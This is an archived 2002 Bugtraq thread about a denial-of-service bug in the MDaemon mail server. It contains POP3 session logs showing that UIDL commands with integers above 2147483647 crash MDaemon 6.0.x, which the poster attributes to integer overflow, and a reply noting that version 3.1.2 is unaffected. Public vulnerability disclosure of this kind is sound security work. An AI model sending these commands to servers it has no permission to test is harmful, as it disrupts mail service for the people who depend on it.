Bugtraq mailing list archives
RE: MDaemon SMTP/POP/IMAP server DoS
From: "Robert Feldbauer" <wuher () swrpg net>
Date: Tue, 29 Oct 2002 11:30:46 -0500
I'm running MDaemon 3.1.2 and this does not have any adverse effect. Here's my log: +OK daisydata.com POP3 server ready <MDAEMON-F200210291127.AA274532MD3626 () mydomain com> USER myusername +OK myusername... Recipient ok PASS mypassword +OK myusername () mydomain com's mailbox has 0 total messages (0 octets). UIDL 2147483647 -ERR no such message UIDL 2147483648 +OK -2147483648 UIDL 2147483649 +OK -2147483647 UIDL 2147483650 +OK -2147483646 And it responds to "QUIT" just fine. Bob Feldbauer wuher () swrpg net
-----Original Message----- From: Basil Hussain [mailto:basil.hussain () kodakweddings com] Sent: Tuesday, October 29, 2002 5:27 AM To: bugtraq () securityfocus com Subject: RE: MDaemon SMTP/POP/IMAP server DoS Hi all,Bug founded in MDaemon's pop-server. It's possible to kill MDaemon by sending long arguments (32b and above) with DELE or UIDL commands. To do this u must have at least mail-account on vulnerable host. After geting long request from client, all MDaemon's Services will be closed (smtp, imap, pop, (?)worldclient). Here the log of attack on local MDaemon POP-server: +OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 <MDAEMON-F200210 271036.AA3656130MD0012 () dark ru> USER D4rkGr3y +OK D4rkGr3y... Recipient ok PASS cool-pass +OK D4rkGr3y () dark ru's mailbox has 1 total messages (18356 octets). UIDL 11111111111111111111111111111111It would appear this is not an issue with the length of string passed to MDaemon, but rather an integer overflow problem. After some testing, I've discovered that if you pass any number greater than 2147483647 (the limit for a signed 4-byte integer), you either get an error or a complete crash of MDaemon. For example: +OK somedomain.com POP MDaemon 6.0.5 ready <MDAEMON-F200210290951.AA5138234MD2795 () somedomain com> USER blah +OK blah... Recipient ok PASS 123456 +OK blah () somedomain com's mailbox has 0 total messages (0 octets). UIDL 2147483647 -ERR no such message UIDL 2147483648 +OK -2147483648 !!! Index 0 is not used UIDL 2147483649 [Connection lost at this point...] By the way, you may have noticed this also works with a slightly older release (6.0.5). Also, hostname and account details have been changed to protect the guilty... :-) Also, I don't know whether this was something with how my test W2K server was set up, but MDaemon would auto-restart afterwards, thus making this bug not so much of a show-stopper and limiting scope for a Denial-of-Service attack somewhat. Regards, Basil Hussain
Current thread:
- MDaemon SMTP/POP/IMAP server DoS D4rkGr3y (Oct 28)
- RE: MDaemon SMTP/POP/IMAP server DoS Basil Hussain (Oct 29)
- RE: MDaemon SMTP/POP/IMAP server DoS Robert Feldbauer (Oct 29)
- <Possible follow-ups>
- Re: MDaemon SMTP/POP/IMAP server DoS Muhammad Faisal Rauf Danka (Oct 29)
- RE: MDaemon SMTP/POP/IMAP server DoS Basil Hussain (Oct 30)
- RE: MDaemon SMTP/POP/IMAP server DoS Basil Hussain (Oct 29)